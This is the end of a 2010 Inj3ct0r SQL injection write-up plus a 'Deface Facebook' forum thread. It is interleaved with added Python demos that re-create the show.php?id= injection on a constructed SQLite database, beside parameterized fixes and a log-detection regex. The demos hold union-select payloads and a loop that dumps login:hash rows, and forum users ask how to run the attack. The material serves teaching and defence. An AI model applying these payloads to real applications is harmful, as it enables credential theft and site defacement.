goOd =] Nice hacking, old school xD
__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> </\ \ \_\ \ \__ ,__\
\ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and update promptly! Watch for updates on Inj3ct0r.com (Inj3ct0r Exploit Database)
__ __ ______
/'__`\ /'__`\/\ ___\
/\ \/\ \ __ _/\ \/\ \ \ \__/
\ \ \ \ \/\ \/'\ \ \ \ \ \___``\
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Greetz]
Greetz to all members of Inj3ct0r.com
Friendly projects: Hack0wn.com, SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go to http://inj3ct0r.com/links =]
Personally, h4x0rz:
0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..
You are good hackers. Respect to y0u!
Farzin0123 (Pianist), visit site: Ueg88.blogfa.com ! Thank you for pushing me to write this article and for reporting the dependence! Personal respect to you from the Inj3ct0r Team!
At the time of publication, all requests work! Attached images: inj3ct0r.com/facebook.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities on Inj3ct0r.com
GoOd luck Hackers! =]
# Inj3ct0r.com [2010-04-06]
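As an added example (not code from the Inj3ct0r write-up quoted above, and not from any of the apps it names), here is the `show.php?id=` pattern re-created in Python against an in-memory SQLite database, so the probing sequence in the write-up can be run offline: a non-numeric id produces a database error (the PHP app leaked it as a mysql_fetch_array() warning), `1 and 1=2 union select ...` empties the real result so the attacker's column is returned instead, and `limit N,1` walks the rows one per request. The same handler is then shown hardened with an integer check plus a bound parameter. SQLite stands in for MySQL, so the payloads swap in sqlite_version() for @@version, sqlite_master for information_schema.tables, and `||` for concat_ws(); the table names, rows and hash strings are constructed for the demo.

```python
"""Added example: the show.php?id= bug re-created on SQLite (constructed data)."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's database; none of this is real data."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE shows (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO shows VALUES (1, 'Lost'), (2, 'Heroes');
        -- plays the role of candukincaid.wp_users in the write-up
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES
            (1, 'admin', 'hash-admin-demo'),
            (2, 'lucia', 'hash-lucia-demo'),
            (3, 'tom',   'hash-tom-demo');
        """
    )
    return con


def vulnerable_show(con, id_param: str):
    """The bug: the request parameter is pasted into the SQL text, exactly
    like mysql_query("... WHERE id=" . $_GET['id']).  Returns the first
    column of the first row, or the database error text (the PHP app
    leaked the same signal as a Warning: mysql_fetch_array() line)."""
    sql = "SELECT title FROM shows WHERE id=" + id_param
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    return None if row is None else str(row[0])


def safe_show(con, id_param: str):
    """Hardened handler: reject anything that is not an integer, then bind.
    The value never becomes SQL text, so there is nothing to escape."""
    if not id_param.isdigit():
        return None
    row = con.execute("SELECT title FROM shows WHERE id=?", (int(id_param),)).fetchone()
    return None if row is None else str(row[0])


# The write-up's payloads with the MySQL-only pieces swapped for SQLite.
PAYLOAD_ERROR = "inj3ct0r"                                        # id=inj3ct0r
PAYLOAD_VERSION = "1 and 1=2 union select sqlite_version()-- 1"   # @@version
PAYLOAD_TABLE_COUNT = ("1 and 1=2 union select count(*) from sqlite_master"
                       " where type='table'-- 1")                 # information_schema.tables


def payload_user_row(n: int) -> str:
    """Row n of wp_users as login:hash (MySQL: concat_ws(0x3a, ...) limit n,1)."""
    return ("1 and 1=2 union select user_login||':'||user_pass from wp_users"
            " limit %d,1-- 1" % n)


def dump_users(con) -> list:
    """Walk wp_users one row per request until the union returns nothing."""
    rows, n = [], 0
    while True:
        row = vulnerable_show(con, payload_user_row(n))
        if row is None or row.startswith("ERROR"):
            return rows
        rows.append(row)
        n += 1


def probe(con) -> dict:
    """Run the write-up's sequence against the vulnerable handler."""
    return {
        "error": vulnerable_show(con, PAYLOAD_ERROR),
        "version": vulnerable_show(con, PAYLOAD_VERSION),
        "table_count": vulnerable_show(con, PAYLOAD_TABLE_COUNT),
        "users": dump_users(con),
    }


def direct_version(con) -> str:
    """Ground truth for comparison: the same value fetched legitimately."""
    return con.execute("select sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = build_db()
    for key, value in probe(db).items():
        print("%-12s %s" % (key, value))
    print("hardened:    ", safe_show(db, PAYLOAD_VERSION), safe_show(db, "1"))
```

Run it directly to print each probe step. The thing to take from `probe()` next to `safe_show()` is that the fix is not escaping the value but refusing to let it become part of the SQL text at all, and that leaking raw database errors is what turned a blind guess into a confirmed injection in the first place.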
- Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: Deface Facebook
wow, so those Facebook apps are still vuln... :love:
-==Just want to learn and learn==-
Re: Deface Facebook
Seems like it, bro....
but I'm confused about how to execute it......! :pusing: :pusing: :pusing: :pusing:
Re: Deface Facebook
This TS is awesome :ngakak: :ngakak: :ngakak:
-
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
So how do you use it, boss...
RJ-45 wrote: Take a look at this, bro...
but I don't know whether it's real or not, coz I haven't asked the person concerned directly yet...
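Added example, not part of this thread or of the Inj3ct0r write-up quoted in it: the show.php?id= flaw the write-up describes, reconstructed in Python against an in-memory SQLite table instead of the app's PHP and MySQL, beside a parameterized version and a small access-log check. Every name here (make_db, show_vulnerable, show_fixed, flag_injection_attempts, INJECTION_PATTERN), the table contents and the log lines are constructed assumptions, not the app's real code or data; the vulnerable function returns the raw database error to the caller to mirror the verbose PHP warnings shown in the write-up.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample table standing in for the app's "shows" data (not the real data).
SHOWS = [(1, "Show One"), (2, "Show Two")]

# Constructed Apache-style access log lines; the query strings mirror the
# shape of the probes in the write-up (non-routable sample addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Apr/2010:22:41:00 +0000] "GET /tv/show.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [06/Apr/2010:22:41:07 +0000] "GET /tv/show.php?id=1+and+1=2+union+select+@@version--+1 HTTP/1.1" 200 1893',
    '203.0.113.5 - - [06/Apr/2010:22:41:09 +0000] "GET /tv/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 HTTP/1.1" 200 2011',
    '198.51.100.7 - - [06/Apr/2010:22:42:00 +0000] "GET /tv/show.php?id=2 HTTP/1.1" 200 498',
]


def make_db():
    """Build an in-memory SQLite database holding the constructed table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shows (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO shows VALUES (?, ?)", SHOWS)
    return conn


def show_vulnerable(conn, id_param):
    """Mirrors the flaw: the raw id value is concatenated into the SQL text,
    and the database error text is handed back to the client, as the PHP
    warnings in the write-up were."""
    query = "SELECT name FROM shows WHERE id = " + id_param
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)
    return row[0] if row else None


def show_fixed(conn, id_param):
    """Hardened version: enforce the expected type, bind the value as a
    query parameter, and never expose the database error."""
    try:
        show_id = int(id_param)
    except (TypeError, ValueError):
        return None
    try:
        row = conn.execute("SELECT name FROM shows WHERE id = ?", (show_id,)).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


# Indicators taken from the request shapes in the write-up.
INJECTION_PATTERN = re.compile(
    r"union\s+(all\s+)?select|information_schema|@@version|concat_ws\s*\(",
    re.IGNORECASE,
)


def flag_injection_attempts(log_lines):
    """Return (line number, decoded request path) for requests whose
    URL-decoded query string carries SQL injection indicators."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not match:
            continue
        decoded = unquote_plus(match.group(1))  # decode '+' and %XX before matching
        if INJECTION_PATTERN.search(decoded):
            hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    db = make_db()
    payload = "1 and 1=2 union select sqlite_version()"
    print("vulnerable, normal id :", show_vulnerable(db, "1"))
    print("vulnerable, union     :", show_vulnerable(db, payload))
    print("vulnerable, bad id    :", show_vulnerable(db, "inj3ct0r"))
    print("fixed, normal id      :", show_fixed(db, "1"))
    print("fixed, union          :", show_fixed(db, payload))
    for number, path in flag_injection_attempts(SAMPLE_LOG):
        print(f"log line {number}: {path}")
```

The vulnerable path answers a union payload with the database version and a non-numeric id with the raw error, which is the same two pieces of information the write-up extracted from the MySQL warnings; the fixed path rejects anything that is not an integer and binds the value, so the same inputs return nothing. The log check decodes the query string first, because the probes in the write-up arrive with `+` and `%28`-style encoding, and flags the union select, information_schema and @@version indicators so an operator sees such requests in monitoring rather than in a public advisory.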